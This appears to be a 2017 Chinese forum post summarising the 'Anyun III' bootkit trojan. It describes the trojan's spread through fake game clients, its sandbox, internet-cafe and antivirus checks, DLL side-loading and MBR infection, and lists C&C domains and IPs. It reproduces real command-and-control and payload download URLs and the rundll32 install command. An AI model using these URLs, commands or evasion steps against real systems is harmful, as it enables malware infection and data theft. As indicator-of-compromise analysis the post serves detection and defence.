暗云木马详细技术资料

发布于:2017-06-12 14:35:27 阅读:755 回帖:0


一、传播渠道:各种下载站的高速下载器,传播量级:百万

 

 



二、传播载体:伪装成 赤月传说、传奇霸业 等游戏微端

  

 


三、木马MBR植入过程

1、赤月传说 (9377_hyaz2a8_108.exe)安装后释放 weblander.exe

2、 weblander.exe判断各种条件,如果符合条件才会下载暗云Ⅲ感染程序到本地安装执行。这些条件包括:

1)安装包文件名格式,必须包含两个下划线和一个点,最后一个段是其推广渠道号

2)通过WMI查询磁盘名称,检测虚拟机

3)通过WMI查询进程列表,检测是否位于网吧

4)通过WMI检测杀毒软件

5)通过目录下的ini判断是否是第一次运行,只有第一次运行才会下载

3、条件判断合格后,将获取到的信息上传到云端,并从云端拉取配置信息:

http://c2tongji.b5156.com:89/stats.php?m=08-00-**-**-**-**&uid=b42be3fd-****-4338-****-d6fd64eb9576&hid=48DC0EC2&channelid=b108&p=9377_hyaz2a8_b108.exe&tick=26C717C1228272B9AC3A9E392CAD0721&pq=0&p3=0(该信息主要包括mac,硬盘序列号,用户id、取到号、文件名等

4、拉到的配置信息为:

[Update] 

Version=2 

Url=http://update.njmmy.com:8089/config/LDrvSvc.zip 

CmdLine=rundll32.exe LDrvSvc.dll,RundllInstall Dir=%appdata%\LDrvSvc

5、从4中的Url下载LDrvSvc.zip,解压后执行4中的cmdLine安装

6、LDrvSvc.zip被解压后,rundll32调用ldrvsvc.dll执行安装,该dll是驱动人生的服务安装dll,能够把当前目录所有文件拷贝到参数指定的目录,并创建系统服务,启动ldrvsvc.dll

7、ldrvsvc.dll启动后,会加载同目录下的DtlCrashCath.dll等支持库文件,而DtlCrashCatch.dll是被恶意补丁过的文件,从而实现白加黑利用。

8、DtlCrashCath.dll从云端http://www.2tf1.com/upcfg.db下载配置文件解密执行

9、upcfg.db写磁盘前64扇区感染机器MBR,实现木马植入

四、详细资料:

暗云Ⅲ木马传播感染分析

http://slab.qq.com/news/tech/1599.html

暗云Ⅲ BootKit 木马分析

http://slab.qq.com/news/tech/1567.html

五、木马C&C地址:

域名

作用

解析ip

地址

创建时间

更新时间

ms.maimai666.com

C&C

23.234.4.130

美国

2015-6-6

2017-2-3

www.acsewle.com

C&C

23.134.13.64

美国

2016-12-16

2017-3-3

www.2tf1.com

感染器

23.234.51.80

美国

2016-9-24

2017-3-3

c2tongji.b5156.com

下载器

112.121.173.20

香港

2016-07-06

2016-07-07

update.njmmy.com

下载器

121.12.170.8

东莞

2017-03-20

2017-03-21

data.b5156.com

关联

58.215.185.43

无锡

update.1a0x.com

关联

121.12.170.8

东莞


最新回复 (0)
返回